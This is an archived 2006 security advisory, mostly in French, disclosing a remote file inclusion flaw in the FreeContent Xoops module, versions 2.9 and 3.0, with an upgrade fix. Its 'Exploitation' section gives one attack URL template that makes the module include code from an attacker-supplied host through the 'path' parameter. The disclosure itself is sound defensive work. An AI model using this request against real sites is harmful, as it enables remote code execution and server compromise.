FreeContent.txt

FreeContent.txt: Posted Apr 17, 2006; Authored by Silitix; Freecontent v2.9 and 3.0 suffer from a remote file inclusion vulnerability.; tags | advisory, remote, file inclusion; SHA-256 | 0c5a8a2a0dc2b4c5e66a279fc98f6a223de63ba736156083d1893868541416fc; Download | Favorite | View

FreeContent.txt

------=_Part_19161_13964465.1145017194132
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline

Produit : FreeContent

La vuln=E9rabilit=E9 a =E9t=E9 identifi=E9 dans la version 2.9 et 3.0. D'au=
tres
versions peuvent =E9galement =EAtre affect=E9es.

Probl=E8me : Remote File Inclusion

Site officiel : http://www.wjue.org/ & http://www.guanxicrm.com/

Auteur : Silitix - Silitix@gmail.com

Description FR :
#############

Il fut le premier de sa g=E9n=E9ration concernant l'insertion de page HTML =
sur
xoops, maintenant d=E9tron=E9 par CJay-Content
une sorte de copie, freeContent est malgr=E9 lui toujours sur la place !
Il permet l'insertion de page html ou php que vous aurez au pr=E9alablement
d=E9posez sur votre serveur.
Dans cette nouvelle version 2.9, il a un d=E9but de reconnaissance concerna=
nt
les liens URL qui se trouveraient dans
vos pages... contrairement =E0 "C-Jay" qui ne g=E8re pas encore =E7=E0 !
Vous pourrez =E9galement cacher certaines pages pour ne pas qu'elles
apparaissent dans le bloc.

Description ENG :
#################

With WebDigest capability FreeContent becomes the first Knowledge oriented
content tool for Xoops.
FreeContent allows you not only to present easily a variety of contents but
also to make concept/topic oriented
WebIntelligence, to organize
community discussion with always up to date and fresh content and
information.
Freecontent WebDigest uses advanced and powerful Text Retrieving Technics t=
o
automatically generate
relevant contents for your website.


Exploitation :
###########

         http://[target]/modules/freecontent/index.php?path=3D[attacker]

Solution
#########

 Appliquer la mise =E0 jour disponible sur le sitte officiel, les
versions 3.1/3.2
ne sont pas affect=E9es.

###### ---- > Avis de s=E9curit=E9 original : www.Silitix.com/freecontent.t=
xt

------=_Part_19161_13964465.1145017194132
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline

Produit : FreeContent<br>
<br>
La vuln=E9rabilit=E9 a =E9t=E9 identifi=E9 dans la version 2.9 et 3.0. D'au=
tres versions peuvent =E9galement =EAtre affect=E9es.<br>
<br>
Probl=E8me : Remote File Inclusion<br>
<br>
Site officiel : <a href=3D"http://www.wjue.org/">http://www.wjue.org/</a> &=
amp; <a href=3D"http://www.guanxicrm.com/">http://www.guanxicrm.com/</a><br=
>
<br>
Auteur : Silitix - <a href=3D"mailto:Silitix@gmail.com">Silitix@gmail.com</=
a> <br>
<br>
Description FR : <br>
#############<br>
<br>
Il fut le premier de sa g=E9n=E9ration concernant l'insertion de page HTML =
sur xoops, maintenant d=E9tron=E9 par CJay-Content <br>
une sorte de copie, freeContent est malgr=E9 lui toujours sur la place !<br=
>
Il permet l'insertion de page html ou php que vous aurez au pr=E9alablement=
 d=E9posez sur votre serveur.<br>
Dans cette nouvelle version 2.9, il a un d=E9but de reconnaissance concerna=
nt les liens URL qui se trouveraient dans<br>
vos pages... contrairement =E0 "C-Jay" qui ne g=E8re pas encore =
=E7=E0 !<br>
Vous pourrez =E9galement cacher certaines pages pour ne pas qu'elles appara=
issent dans le bloc.<br>
<br>
Description ENG :<br>
#################<br>
<br>
With WebDigest capability FreeContent becomes the first Knowledge oriented =
content tool for Xoops.<br>
FreeContent allows you not only to present easily a variety of contents but=
 also to make concept/topic oriented <br>
WebIntelligence, to organize <br>
community discussion with always up to date and fresh content and informati=
on.<br>
Freecontent WebDigest uses advanced and powerful Text Retrieving Technics t=
o automatically generate <br>
relevant contents for your website.<br>
<br>
<br>
Exploitation : <br>
###########<br>
<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; http://[target]/modules/fr=
eecontent/index.php?path=3D[attacker]<br>
<br>
Solution<br>
#########<br>
<br>
&nbsp;Appliquer la mise =E0 jour disponible sur le sitte officiel, les vers=
ions 3.1/3.2 ne sont pas affect=E9es.<br>
<br>
###### ---- > Avis de s=E9curit=E9 original : <a href=3D"http://www.Sili=
tix.com/freecontent.txt">www.Silitix.com/freecontent.txt</a><br>
<br>

------=_Part_19161_13964465.1145017194132--

Top Authors In Last 30 Days

Red Hat 205 files
Ubuntu 84 files
Gentoo 31 files
Debian 21 files
tmrswrr 10 files
Sina Kheirkhah 7 files
bRpsd 4 files
Rodolfo Tavares 4 files
nu11secur1ty 3 files
Google Security Research 3 files

File Archives

Systems

AIX (429)
Apple (2,090)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,078)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,531)
HPUX (880)
iOS (376)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,350)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,266)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,658)
UNIX (9,425)
UnixWare (187)
Windows (6,666)
Other

FreeContent.txt

FreeContent.txt

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

FreeContent.txt

Share This

FreeContent.txt

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems